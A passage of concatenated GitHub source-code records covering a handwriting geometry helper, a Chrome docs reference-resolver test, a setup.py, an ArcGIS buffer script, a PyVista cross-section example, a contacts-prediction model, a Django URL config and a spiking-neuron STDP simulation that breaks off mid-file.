ns.append(mid_points[-1])\n sdata.strokes = json.dumps(new_strokes)\n return sdata\n\ndef distance_point_and_line(p1, p2, p, W, H):\n \"\"\"p1, p2 を結ぶ直線と点p との距離を求める。p1,p2は(x,y)なTuple\"\"\"\n a,b = (-1.0*(p2[1]-p1[1])/W, 1.0*(p2[0]-p1[0])/H)\n c = -(a*p1[0]/W+b*p1[1]/H)\n d = math.sqrt(a*a+b*b)\n if d == 0:\n return calc_distance(p1, p, W, H)\n return abs(a*p[0]/W+b*p[1]/H+c)/d\n\ndef calc_direction(prev_point, point, n_direction, noise_range=None):\n noise_x = noise_y = 1\n if noise_range:\n noise_x = random.uniform(*noise_range)\n noise_y = random.uniform(*noise_range)\n dx = (float(point[0]) - float(prev_point[0])) * noise_x\n dy = (float(point[1]) - float(prev_point[1])) * noise_y\n unit_arg = ((2*math.pi)/n_direction)\n direction = round(math.atan2(dy, dx)/unit_arg) % n_direction\n return int(direction)\n\n\ndef calc_distance(prev_point, point, width, height, noise_range=None):\n dx, dy = calc_point_diff(prev_point, point, width, height, noise_range=noise_range)\n return math.sqrt(dx*dx+dy*dy)\n\ndef calc_point_diff(prev_point, point, width, height, noise_range=None):\n noise_x = noise_y = 1\n if noise_range:\n noise_x = random.uniform(*noise_range)\n noise_y = random.uniform(*noise_range)\n dx = ((float(point[0]) - float(prev_point[0])) / width) * noise_x\n dy = ((float(point[1]) - float(prev_point[1])) / height) * noise_y\n return dx, dy\n\n","repo_name":"mokemokechicken/handwrite_web","sub_path":"src/hwencoder/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12878145035","text":"import os\nimport unittest\n\nfrom future import Future\nfrom reference_resolver import ReferenceResolver\nfrom test_object_store import TestObjectStore\nfrom test_util import Server2Path\nfrom third_party.json_schema_compiler.model import Namespace\n\n\n_TEST_DATA = {\n 'baz': {\n 'namespace': 'baz',\n 'description': '',\n 'types': [\n {\n 'id': 'baz_t1',\n 'type': 'any',\n },\n {\n 'id': 'baz_t2',\n 'type': 'any',\n },\n {\n 'id': 'baz_t3',\n 'type': 'any',\n }\n ],\n 'functions': [\n {\n 'name': 'baz_f1',\n 'type': 'function'\n },\n {\n 'name': 'baz_f2',\n 'type': 'function'\n },\n {\n 'name': 'baz_f3',\n 'type': 'function'\n }\n ],\n 'events': [\n {\n 'name': 'baz_e1',\n 'type': 'function'\n },\n {\n 'name': 'baz_e2',\n 'type': 'function'\n },\n {\n 'name': 'baz_e3',\n 'type': 'function'\n }\n ],\n 'properties': {\n 'baz_p1': {'type': 'any'},\n 'baz_p2': {'type': 'any'},\n 'baz_p3': {'type': 'any'}\n }\n },\n 'bar.bon': {\n 'namespace': 'bar.bon',\n 'description': '',\n 'types': [\n {\n 'id': 'bar_bon_t1',\n 'type': 'any',\n },\n {\n 'id': 'bar_bon_t2',\n 'type': 'any',\n },\n {\n 'id': 'bar_bon_t3',\n 'type': 'any',\n }\n ],\n 'functions': [\n {\n 'name': 'bar_bon_f1',\n 'type': 'function'\n },\n {\n 'name': 'bar_bon_f2',\n 'type': 'function'\n },\n {\n 'name': 'bar_bon_f3',\n 'type': 'function'\n }\n ],\n 'events': [\n {\n 'name': 'bar_bon_e1',\n 'type': 'function'\n },\n {\n 'name': 'bar_bon_e2',\n 'type': 'function'\n },\n {\n 'name': 'bar_bon_e3',\n 'type': 'function'\n }\n ],\n 'properties': {\n 'bar_bon_p1': {'type': 'any'},\n 'bar_bon_p2': {'type': 'any'},\n 'bar_bon_p3': {'type': 'any'}\n }\n },\n 'bar': {\n 'namespace': 'bar',\n 'description': '',\n 'types': [\n {\n 'id': 'bar_t1',\n 'type': 'any',\n 'properties': {\n 'bar_t1_p1': {\n 'type': 'any'\n }\n }\n },\n {\n 'id': 'bar_t2',\n 'type': 'any',\n 'properties': {\n 'bar_t2_p1': {\n 'type': 'any'\n }\n }\n },\n {\n 'id': 'bar_t3',\n 'type': 'any',\n },\n {\n 'id': 'bon',\n 'type': 'any'\n }\n ],\n 'functions': [\n {\n 'name': 'bar_f1',\n 'type': 'function'\n },\n {\n 'name': 'bar_f2',\n 'type': 'function'\n },\n {\n 'name': 'bar_f3',\n 'type': 'function'\n }\n ],\n 'events': [\n {\n 'name': 'bar_e1',\n 'type': 'function'\n },\n {\n 'name': 'bar_e2',\n 'type': 'function'\n },\n {\n 'name': 'bar_e3',\n 'type': 'function'\n }\n ],\n 'properties': {\n 'bar_p1': {'type': 'any'},\n 'bar_p2': {'type': 'any'},\n 'bar_p3': {'$ref': 'bar_t1'}\n }\n },\n 'foo': {\n 'namespace': 'foo',\n 'description': '',\n 'types': [\n {\n 'id': 'foo_t1',\n 'type': 'any',\n },\n {\n 'id': 'foo_t2',\n 'type': 'any',\n },\n {\n 'id': 'foo_t3',\n 'type': 'any',\n 'events': [\n {\n 'name': 'foo_t3_e1',\n 'type': 'function'\n }\n ]\n }\n ],\n 'functions': [\n {\n 'name': 'foo_f1',\n 'type': 'function'\n },\n {\n 'name': 'foo_f2',\n 'type': 'function'\n },\n {\n 'name': 'foo_f3',\n 'type': 'function'\n }\n ],\n 'events': [\n {\n 'name': 'foo_e1',\n 'type': 'function'\n },\n {\n 'name': 'foo_e2',\n 'type': 'function'\n },\n {\n 'name': 'foo_e3',\n 'type': 'function'\n }\n ],\n 'properties': {\n 'foo_p1': {'$ref': 'foo_t3'},\n 'foo_p2': {'type': 'any'},\n 'foo_p3': {'type': 'any'}\n }\n }\n}\n\n\nclass _FakePlatformBundle(object):\n def __init__(self):\n self.platforms = ('apps', 'extensions')\n\n def GetAPIModels(self, platform):\n if platform == 'apps':\n return _FakeAPIModels(_TEST_DATA)\n # Only includes some of the data in the 'extensions' APIModels.\n # ReferenceResolver will have to look at other platforms to resolve 'foo'.\n return _FakeAPIModels({\n 'bar': _TEST_DATA['bar'],\n 'bar.bon': _TEST_DATA['bar.bon'],\n 'baz': _TEST_DATA['baz']\n })\n\n\nclass _FakeAPIModels(object):\n def __init__(self, apis):\n self._apis = apis\n\n def GetNames(self):\n return self._apis.keys()\n\n def GetModel(self, name):\n return Future(value=Namespace(self._apis[name], 'fake/path.json'))\n\n\nclass ReferenceResolverTest(unittest.TestCase):\n def setUp(self):\n self._base_path = Server2Path('test_data', 'test_json')\n\n def _ReadLocalFile(self, filename):\n with open(os.path.join(self._base_path, filename), 'r') as f:\n return f.read()\n\n def testGetLink(self):\n apps_resolver = ReferenceResolver(\n _FakePlatformBundle().GetAPIModels('apps'),\n TestObjectStore('apps/test'))\n extensions_resolver = ReferenceResolver(\n _FakePlatformBundle().GetAPIModels('extensions'),\n TestObjectStore('extensions/test'))\n\n self.assertEqual({\n 'href': 'foo',\n 'text': 'foo',\n 'name': 'foo'\n }, apps_resolver.GetLink('foo', namespace='baz'))\n self.assertEqual({\n 'href': 'foo#type-foo_t1',\n 'text': 'foo.foo_t1',\n 'name': 'foo_t1'\n }, apps_resolver.GetLink('foo.foo_t1', namespace='baz'))\n self.assertEqual({\n 'href': 'baz#event-baz_e1',\n 'text': 'baz_e1',\n 'name': 'baz_e1'\n }, apps_resolver.GetLink('baz.baz_e1', namespace='baz'))\n self.assertEqual({\n 'href': 'baz#event-baz_e1',\n 'text': 'baz_e1',\n 'name': 'baz_e1'\n }, apps_resolver.GetLink('baz_e1', namespace='baz'))\n self.assertEqual({\n 'href': 'foo#method-foo_f1',\n 'text': 'foo.foo_f1',\n 'name': 'foo_f1'\n }, apps_resolver.GetLink('foo.foo_f1', namespace='baz'))\n self.assertEqual({\n 'href': 'foo#property-foo_p3',\n 'text': 'foo.foo_p3',\n 'name': 'foo_p3'\n }, apps_resolver.GetLink('foo.foo_p3', namespace='baz'))\n self.assertEqual({\n 'href': 'bar.bon#type-bar_bon_t3',\n 'text': 'bar.bon.bar_bon_t3',\n 'name': 'bar_bon_t3'\n }, apps_resolver.GetLink('bar.bon.bar_bon_t3', namespace='baz'))\n self.assertEqual({\n 'href': 'bar.bon#property-bar_bon_p3',\n 'text': 'bar_bon_p3',\n 'name': 'bar_bon_p3'\n }, apps_resolver.GetLink('bar_bon_p3', namespace='bar.bon'))\n self.assertEqual({\n 'href': 'bar.bon#property-bar_bon_p3',\n 'text': 'bar_bon_p3',\n 'name': 'bar_bon_p3'\n }, apps_resolver.GetLink('bar.bon.bar_bon_p3', namespace='bar.bon'))\n self.assertEqual({\n 'href': 'bar#event-bar_e2',\n 'text': 'bar_e2',\n 'name': 'bar_e2'\n }, apps_resolver.GetLink('bar.bar_e2', namespace='bar'))\n self.assertEqual({\n 'href': 'bar#type-bon',\n 'text': 'bon',\n 'name': 'bon'\n }, apps_resolver.GetLink('bar.bon', namespace='bar'))\n self.assertEqual({\n 'href': 'foo#event-foo_t3-foo_t3_e1',\n 'text': 'foo_t3.foo_t3_e1',\n 'name': 'foo_t3_e1'\n }, apps_resolver.GetLink('foo_t3.foo_t3_e1', namespace='foo'))\n self.assertEqual({\n 'href': 'foo#event-foo_t3-foo_t3_e1',\n 'text': 'foo_t3.foo_t3_e1',\n 'name': 'foo_t3_e1'\n }, apps_resolver.GetLink('foo.foo_t3.foo_t3_e1', namespace='foo'))\n self.assertEqual({\n 'href': 'foo#event-foo_t3-foo_t3_e1',\n 'text': 'foo_t3.foo_t3_e1',\n 'name': 'foo_t3_e1'\n }, apps_resolver.GetLink('foo.foo_p1.foo_t3_e1', namespace='foo'))\n self.assertEqual({\n 'href': 'bar#property-bar_t1-bar_t1_p1',\n 'text': 'bar.bar_t1.bar_t1_p1',\n 'name': 'bar_t1_p1'\n }, apps_resolver.GetLink('bar.bar_p3.bar_t1_p1', namespace='foo'))\n # Test extensions_resolver.\n self.assertEqual({\n 'href': 'bar#property-bar_t1-bar_t1_p1',\n 'text': 'bar.bar_t1.bar_t1_p1',\n 'name': 'bar_t1_p1'\n }, extensions_resolver.GetLink('bar.bar_p3.bar_t1_p1', namespace='foo'))\n self.assertEqual({\n 'href': 'bar#property-bar_t1-bar_t1_p1',\n 'text': 'bar_t1.bar_t1_p1',\n 'name': 'bar_t1_p1'\n }, apps_resolver.GetLink('bar_p3.bar_t1_p1', namespace='bar'))\n self.assertEqual(\n None,\n apps_resolver.GetLink('bar.bar_p3.bar_t2_p1', namespace='bar'))\n self.assertEqual(\n None,\n apps_resolver.GetLink('bar.bon.bar_e3', namespace='bar'))\n self.assertEqual(\n None,\n apps_resolver.GetLink('bar_p3', namespace='baz.bon'))\n self.assertEqual(\n None,\n apps_resolver.GetLink('falafel.faf', namespace='a'))\n self.assertEqual(\n None,\n apps_resolver.GetLink('bar_p3', namespace='foo'))\n # Exists in apps but not extensions.\n self.assertEqual(\n None,\n extensions_resolver.GetLink('foo.foo_p3', namespace='baz'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kiwibrowser/src","sub_path":"chrome/common/extensions/docs/server2/reference_resolver_test.py","file_name":"reference_resolver_test.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"zh","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"26578742567","text":"from setuptools import setup\n\nfrom colorvote import __version__\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\nsetup(\n name='colorvote',\n version=__version__,\n description='A package for the colored coins voting protocol',\n url='http://github.com/Ingimarsson/colorvote',\n author='Brynjar Ingimarsson',\n author_email='brynjar@ingimarsson.is',\n long_description=long_description,\n long_description_content_type='text/markdown',\n license='MIT',\n packages=['colorvote'],\n install_requires=[\n 'requests',\n ],\n zip_safe=False,\n python_requires='>=3.6'\n)\n","repo_name":"Ingimarsson/colorvote","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20875810939","text":"#%% Task 1\n#1a. Creating the initial buffer script \nimport arcpy\n\nstreams = \"V:\\\\ENV859_PS4\\\\Data\\\\streams.shp\"\noutFeatureClass = \"V:\\\\ENV859_PS4\\\\Scratch\\\\StrmBuff1km.shp\"\nbuffDist = '1000 meters'\n\narcpy.Buffer_analysis(streams, outFeatureClass, buffDist, \"\", \"\", dissolve_option = \"ALL\")\n\nprint(arcpy.GetMessages())\n\n","repo_name":"shanashapiro/GeoPortfolio","sub_path":"ENV859_PS4/Scripts/Task1a.py","file_name":"Task1a.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44916469877","text":"\"\"\"\nGeological Cross Section\n~~~~~~~~~~~~~~~~~~~~~~~~\n\nPlot a geological cross section in 3D space.\n\nWe have a cross section PNG image and we know three coordinates along that section:\n\n* This section goes from +200m to -2000m in vertical extent\n* Coordinates of the start point: 32362837 5769796\n* Coordinates of the bend: 32368424 5765456 (the bending point is indicated with a * \"K\" at around half the section)\n* Coordinates of the end point: 32374114 5763507\n\n\nOriginally posted: https://github.com/pyvista/pyvista-support/issues/272\n\"\"\"\n\nimport numpy as np\nimport pooch\nimport pyvista as pv\n\n###############################################################################\n# Parameters for cross section\nzrng = [-2000, 200]\nstart = [32362837, 5769796]\nbend = [\n 32368424,\n 5765456,\n] # (the bending point is indicated with a \"K\" at around half the section)\nend = [32374114, 5763507]\n\n###############################################################################\n# Make a surface mesh representing that coverage/ This mesh consists of 6\n# points. Generate them:\n\n# a-----b-----e\n# | | |\n# | | |\n# d-----c-----f\na = start + [\n zrng[1],\n]\nb = bend + [\n zrng[1],\n]\nc = bend + [\n zrng[0],\n]\nd = start + [\n zrng[0],\n]\ne = end + [\n zrng[1],\n]\nf = end + [\n zrng[0],\n]\n\n###############################################################################\n# Now make a poly data mesh of these points\npoints = np.array([a, b, c, d, e, f]).astype(float)\nfaces = np.array([4, 0, 1, 2, 3, 4, 1, 4, 5, 2])\nsurface = pv.PolyData(points, faces)\n\n###############################################################################\n# Map the texture to the mesh.\n# - We know the tcoords of a, d, e, & f, but not necessarily b & c\n# - to find them, scale by cell sizes:\n# - Get the width of the two cells to find those coords\nw = surface.compute_cell_sizes()[\"Area\"] / np.ptp(zrng)\ntw = (w / np.sum(w))[0]\n\n# Generate Tcoords now!\nt_coords = np.array(\n [\n [0, 1],\n [tw, 1],\n [tw, 0],\n [0, 0],\n [1, 1],\n [1, 0],\n ]\n)\nsurface.active_t_coords = t_coords\n\n###############################################################################\n# Load the texture image\nurl = \"https://raw.githubusercontent.com/pyvista/vtk-data/master/Data/geo-cross-section.png\"\nfile_path = pooch.retrieve(url=url, known_hash=None)\ntexture = pv.Texture(file_path)\n\n###############################################################################\n# Plot it up!\ncpos = [\n (32361897.379640546, 5777033.66791174, 341.48314909204873),\n (32366747.758752592, 5766374.637744438, -1142.521946006218),\n (0.047926147231751065, -0.11631040130754997, 0.9920559333823861),\n]\nsurface.plot(texture=texture, cpos=cpos, show_edges=True)\n","repo_name":"banesullivan/banesullivan","sub_path":"pyvista-examples/cross-section-simple.py","file_name":"cross-section-simple.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"23191048209","text":"\"\"\"\nClément Dauvilliers - EPFL - 01/05/2022\n\nImplements the contacts prediction model\n\"\"\"\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.feature_selection import RFECV\n\n\ndef to_binary_nonzero(array):\n \"\"\"\n Converts an array to binary values indicating nonzero entries.\n :param array: ndarray.\n :return: an array of identical shape whose values are 0 or 1 based on\n whether the original value is zero or nonzero.\n \"\"\"\n return (array > 0).astype(int)\n\n\nclass ContactsPredictor:\n \"\"\"\n Model that predicts the contact matrix for a individual based on their\n socio-economic factors.\n \"\"\"\n def __init__(self, max_depth=10, verbose=True):\n \"\"\"\n :param max_depth: max depth of the underlying Random Forest Regressor.\n :param verbose: boolean, whether to output detailed information about the\n various processes.\n \"\"\"\n self.max_depth = max_depth\n self.verbose = verbose\n\n def fit(self, X, y):\n \"\"\"\n :param X: pd Dataframe of shape (nb_samples, nb_variables)\n :param y: pd Dataframe of shape (nb_samples, predicted_vars),\n flattened contact matrices.\n :return: the fitted object (self).\n \"\"\"\n self.features_names_ = X.columns\n self.predicted_variables_names_ = y.columns\n\n if self.verbose:\n print(f\"Fitting input of shape {X.shape} to {y.shape[1]} features\")\n print(f\"Max depth: {self.max_depth}\")\n\n # First step: predicts whether there is any contact\n binary_y = to_binary_nonzero(y)\n self.binary_models = dict()\n # Each column of Y is a predicted contact variable\n for contacts_category, target in binary_y.iteritems():\n if self.verbose:\n print(f\"Fitting contacts category {contacts_category}\")\n rfecv = RFECV(estimator=RandomForestClassifier(max_depth=self.max_depth, random_state=42),\n step=4, cv=5).fit(X, target)\n self.binary_models[contacts_category] = rfecv\n\n return self\n\n def score(self, X, y):\n \"\"\"\n :param X: pd Dataframe of shape (nb_samples, np_variables)\n :param y: pd Dataframe of shape (nb_samples, predicted_vars), flattened contact matrices.\n :return: (CS, RS) where:\n -- CS is the binary classification score, the accuracy at predicting whether an individual's\n contact matrix entry is zero;\n -- RS is the regression score: for an individual and a contact matrix entry that is known to be\n non zero, corresponds to the average R2 score.\n \"\"\"\n # Evaluates the classification models\n binary_y = to_binary_nonzero(y)\n classification_scores = dict()\n for contact_category, target in binary_y.iteritems():\n rfecv = self.binary_models[contact_category]\n classification_scores[contact_category] = rfecv.score(X, target)\n\n return classification_scores\n","repo_name":"dauvillc/covid-19-switzerland","sub_path":"model/contacts_model.py","file_name":"contacts_model.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40955945309","text":"\"\"\"comp9900 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import re_path, include\nfrom django.contrib import admin\nfrom . import views\nfrom rest_framework.documentation import include_docs_urls\n\nurlpatterns = [\n re_path(r'^admin/', admin.site.urls),\n re_path('docs/', include_docs_urls(title='API interface document',\n authentication_classes=[],\n permission_classes=[])),\n re_path(r'^login/', views.LoginView.as_view(), name='login'),\n re_path(r'^register/', views.RegisterView.as_view(), name='register'),\n re_path(r'^create_needs/', views.CreateneedsView.as_view(), name='create needs'),\n re_path(r'^add_needs_to_c/', views.AddneedsView.as_view(), name='add needs to a charity'),\n re_path(r'^show_20_needs/', views.ShowneedsView.as_view(), name='show top20 needs'),\n re_path(r'^show_charity_needs/', views.ShowCharityNeedsView.as_view(), name='show charity needs'),\n re_path(r'^show_sponsor_help/', views.ShowsponsorhelpView.as_view(), name='show sponsor help list'),\n re_path(r'^add_help_to_s/', views.AddhelpView.as_view(), name='add help to a sponsor'),\n re_path(r'^update_sponsor/', views.UpdateSponsorView.as_view(), name='update sponsor'),\n re_path(r'^update_charity/', views.UpdateCharityView.as_view(), name='update charity'),\n re_path(r'^create_event/', views.CreateEventView.as_view(), name='create event'),\n re_path(r'^show_c_event/', views.ShowEventbyC.as_view(), name='show events of a charity'),\n re_path(r'^sponsor_event/', views.SponsorEvent.as_view(), name='sponsor event'),\n re_path(r'^delete_needs/', views.DeleteneedsView.as_view(), name='delete needs'),\n re_path(r'^follow_c/', views.FollowView.as_view(), name='follow charity'),\n re_path(r'^unfollow_c/', views.UnfollowView.as_view(), name='unfollow charity'),\n re_path(r'^showfollow_c/', views.ShowfollowView.as_view(), name='show follow charity'),\n re_path(r'^show_c/', views.ShowCharityView.as_view(), name='show charity details'),\n re_path(r'^show_s/', views.ShowSponsorView.as_view(), name='show sponsor details'),\n re_path(r'^update_event/', views.UpdateEvent.as_view(), name='update event'),\n re_path(r'^rate_event/', views.RatingEvent.as_view(), name='rate c by s or rate s by c'),\n re_path(r'^add_tag_event/', views.AddtagsView.as_view(), name='add tag to a event'),\n re_path(r'^del_tag_event/', views.DeletetagsView.as_view(), name='add tag to a event'),\n re_path(r'^show_event/', views.ShowEvent.as_view(), name='show a event'),\n re_path(r'^show_s_event/', views.ShowEventbyS.as_view(), name='show sponsors events'),\n re_path(r'^del_needs/', views.Deleteneeds_cView.as_view(), name='delete needs of a c'),\n re_path(r'^del_help/', views.DeletehelpView.as_view(), name='del help of a sponsor'),\n re_path(r'^recommandations/', views.Recommandations.as_view(), name='recommand to a charity'),\n re_path(r'^search_event/', views.SearchEvent.as_view(), name='search event'),\n re_path(r'^Top_sponsor/', views.Topsponsors.as_view(), name='get top sponsor of a charity'),\n re_path(r'^chat_show/', views.ChatView.as_view(), name='show chat history'),\n re_path(r'^chat_push/', views.PushView.as_view(), name='push chat'),\n re_path(r'^review/', views.ReviewView.as_view(), name='review'),\n re_path('chat/', include('chat.urls')),\n]\n","repo_name":"unsw-cse-comp3900-9900-22T3/capstone-project-9900-w18q-1459","sub_path":"comp9900/comp9900/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31099927967","text":"__author__ = 'juancarlosfarah'\n__authoremail__ = 'juancarlos.farah14@imperial.ac.uk'\n\nimport math\nfrom copy import deepcopy\nimport sys\nimport os\nfrom matplotlib.patches import Rectangle\nimport numpy as np\nimport pylab\n\nroot = os.path.abspath(os.path.join(\"..\", \"..\", \"stage1\"))\nsys.path.append(root)\n\nfrom pattern_recognition import neuron\n\n# Import simulation_dao for saving.\n#TODO: Uncomment\n# server = os.path.abspath(os.path.join(\"..\", \"..\", \"..\", \"server\"))\n# sys.path.append(server)\n# import simulation_dao\n\n\nclass Simulation:\n \"\"\"\n Simulation of a given number of afferents firing into a pattern\n recognition neuron over a given number of time steps.\n \"\"\"\n # Defaults\n A_PLUS = neuron.Neuron.A_PLUS\n A_RATIO = neuron.Neuron.A_RATIO\n THETA = neuron.Neuron.THETA\n\n def __init__(self, description=None, training=True):\n self.t_min = 0 # Start time in ms.\n self.t_step = 1 # Time step in ms.\n self.spike_trains = None\n self.start_positions = None\n self.num_afferents = None\n self.neurons = []\n self.pattern_duration = None\n self.duration = None\n self.savable = True\n self.sampling_interval = None\n self.cursor = None\n self.description = description\n self.training = training\n\n def load_file(self, filename, folder=\"samples/\", extension=\".npz\"):\n \"\"\"\n Loads a file containing sample spike trains.\n :param filename: Name of file with spike trains.\n :param folder: Folder containing sample files.\n :param extension: Filename extension.\n :return: None.\n \"\"\"\n path = folder + filename + extension\n sample = np.load(path)\n self.spike_trains = sample['spike_trains']\n\n if 'start_positions' in sample:\n self.start_positions = sample['start_positions']\n else:\n self.start_positions = []\n\n if 'pattern_duration' in sample:\n self.pattern_duration = sample['pattern_duration']\n else:\n self.pattern_duration = 50\n\n self.num_afferents = self.spike_trains.shape[0]\n self.duration = self.spike_trains.shape[1]\n self.sampling_interval = math.ceil(self.duration / 5)\n\n def load_sample(self, sample, cursor):\n \"\"\"\n Loads a sample from the database.\n :param sample: Object with general sample information.\n :param cursor: Cursor to load.\n :return: None.\n \"\"\"\n if 'start_positions' in sample:\n self.start_positions = sample['start_positions']\n else:\n self.start_positions = []\n\n if 'pattern_duration' in sample:\n self.pattern_duration = sample['pattern_duration']\n else:\n self.pattern_duration = 50\n self.num_afferents = sample['num_efferents']\n self.duration = sample['duration']\n self.sampling_interval = math.ceil(self.duration / 5)\n self.cursor = cursor\n\n def load(self, sample):\n \"\"\"\n Loads a sample.\n :param sample: Sample\n :return: None.\n \"\"\"\n self.spike_trains = sample.spike_trains\n self.start_positions = sample.start_positions\n self.pattern_duration = sample.pattern_duration\n self.num_afferents = self.spike_trains.shape[0]\n self.duration = self.spike_trains.shape[1]\n self.sampling_interval = math.ceil(self.duration / 5)\n\n def add_neuron(self, a_plus=A_PLUS, a_ratio=A_RATIO, theta=THETA, weights=None):\n \"\"\"\n Adds neuron to simulation.\n :return: Neuron.\n \"\"\"\n n = neuron.Neuron(self.num_afferents,\n a_plus,\n a_ratio,\n theta,\n weights)\n self.neurons.append(n)\n return n\n\n def plot_weight_distributions(self):\n # Values for plotting weights.\n frame = 1\n frames = 5\n bin_size = 50\n frame_step = self.duration / frames\n rows = frames + 1\n\n # Plot weight distribution at given intervals.\n for ms in range(self.duration):\n if ms % frame_step == 0:\n self.neurons[0].plot_weight_distribution(ms, rows,\n current_frame=frame,\n bin_size=bin_size)\n frame += 1\n\n # Plot final weight distribution.\n self.neurons[0].plot_weight_distribution(self.duration, rows,\n current_frame=frame,\n bin_size=bin_size)\n\n def run(self, save_weights=False):\n \"\"\"\n Runs a simulation.\n :param save_weights: Saves all historic weights. Only for debugging.\n :return: None.\n \"\"\"\n\n # If weights are being saved, simulation is not savable.\n self.savable = not save_weights\n\n # If simulation has a cursor. Clear spike trains\n # as they will come from the cursor and set cursor\n # flag to true.\n use_cursor = False\n if self.cursor is not None:\n self.spike_trains = np.zeros((self.num_afferents, self.duration))\n use_cursor = True\n\n # Reset neurons.\n for i in range(len(self.neurons)):\n\n # Clear spike times container.\n self.neurons[i].spike_times = []\n\n # Create container for results.\n self.neurons[i].potential = [j for j in range(self.duration + 1)]\n\n # Get membrane potential at each given point.\n for ms in range(0, self.duration - 1):\n\n # If simulation has a cursor. Get spikes from cursor.\n if use_cursor:\n spikes = self.cursor.next()['spikes']\n self.spike_trains[:, ms] = np.reshape(spikes,\n (1, self.num_afferents))\n else:\n spikes = deepcopy(self.spike_trains[:, ms])\n\n # Shape spikes.\n spikes = np.reshape(spikes, (self.num_afferents, 1))\n\n for n in self.neurons:\n\n # Update time delta.\n if len(n.spike_times) > 0:\n n.time_delta = ms - n.spike_times[-1]\n\n # Update EPSP inputs.\n n.update_epsps(spikes)\n\n # Send inhibitory signal to sibling neurons.\n if n.time_delta == 0:\n n.ipsps = np.array([])\n for s in n.siblings:\n s.update_ipsps(ms)\n\n # Calculate membrane potential.\n p = n.calculate_membrane_potential(ms)\n\n # Update LTP window width.\n n.update_ltp_window_width(ms)\n\n # Post the potential to the next ms.\n n.potential[ms + 1] = p\n\n # Record weights at this point only if running with flag.\n if save_weights:\n if n.historic_weights.size == 0:\n n.historic_weights = self.neurons[0].current_weights\n else:\n n.historic_weights = np.hstack((n.historic_weights,\n n.current_weights))\n\n # Save weight distribution if at interval.\n if ms % self.sampling_interval == 0:\n n.save_weight_distributions()\n\n # Update weights.\n if self.training:\n n.update_weights(self.spike_trains, ms)\n\n # If threshold has been met and more than 1 ms has elapsed\n # since the last post-synaptic spike, schedule a spike.\n if p >= n.theta and (n.time_delta > 1 or n.time_delta is None):\n n.spike_times.append(ms + 1)\n\n # Progress bar.\n progress = (ms / float(self.duration - 1)) * 100\n sys.stdout.write(\"Processing spikes: %d%% \\r\" % progress)\n sys.stdout.flush()\n\n # Close cursor and reset to None.\n if use_cursor:\n self.cursor.close()\n self.cursor = None\n\n \"\"\"\n def plot_weights(self):\n start = self.t_min\n end = self.duration - 1\n\n # Container for time.\n time = np.arange(start, end, 1, dtype=np.int32)\n\n # Sample 1% of available afferents.\n neuron_sample_size = int(self.neurons[0].num_afferents * 0.01)\n\n # Plot sample neurons' weight over time.\n for i in range(0, neuron_sample_size):\n pylab.plot(time[start:end],\n self.neurons[0].historic_weights[i, start:end])\n pylab.xlabel('Time (ms)')\n pylab.ylabel('Weight')\n pylab.title('Synaptic Weight')\n pylab.show()\n \"\"\"\n def plot_membrane_potential(self):\n start = self.t_min\n end = self.duration\n\n # Container for time.\n time = np.arange(start, end, 1, dtype=np.int32)\n\n # Up to five colors supported.\n colors = [\"#E6E6E6\", \"#CCFFCC\", \"#FFCC99\", \"#CCFFFF\", \"#FFFFCC\"]\n\n # Boundaries.\n min_y = self.neurons[0].theta * -0.5\n max_y = self.neurons[0].theta * 2.25\n\n # Prepare the pattern plot.\n for i in range(len(self.start_positions)):\n color = colors[i % len(colors)]\n for j in self.start_positions[i]:\n pylab.gca().add_patch(Rectangle((j, min_y),\n self.pattern_duration,\n max_y + math.fabs(min_y),\n facecolor=color,\n edgecolor=color))\n\n # Plot membrane potential for each neuron.\n for n in self.neurons:\n pylab.plot(time[start:end], n.potential[start:end])\n pylab.ylim(min_y, max_y)\n\n # Prepare and display plot.\n pylab.xlabel('Time (ms)')\n pylab.ylabel('Membrane Potential')\n pylab.title('Spike Train with STDP')\n pylab.show()\n\n'''\n# Run Sample Test\n# ===============\n# sample = poisson_pattern_generator.generate_sample(num_neurons,\n# test_length,\n# pattern_len)\nif __name__ == '__main__':\n sim = Simulation()\n # sim.load_file(\"1_500_50000_50_0.25_0.5_10.0\")\n sim.load_file(\"trial_inv_100pc\")\n n1 = sim.add_neuron(0.03125, .95, 300)\n # n2 = sim.add_neuron(0.03125, 0.91, 125)\n # n3 = sim.add_neuron(0.03125, 0.91, 125)\n # n1.connect(n2)\n # n1.connect(n3)\n # n2.connect(n3)\n sim.run()\n w = n1.current_weights\n sim.plot_membrane_potential()\n # for i in range(2):\n # sim = Simulation()\n # sim.load_file(\"trial_inv_50pc\")\n # n1 = sim.add_neuron(0.03125, .95, 275)\n # n1.current_weights = w\n # sim.run()\n # w = n1.current_weights\n # sim.plot_membrane_potential()\n # sim.plot_weights()\n\n\n\n # Save simulation to database.\n # connection_string = \"mongodb://localhost\"\n # connection = 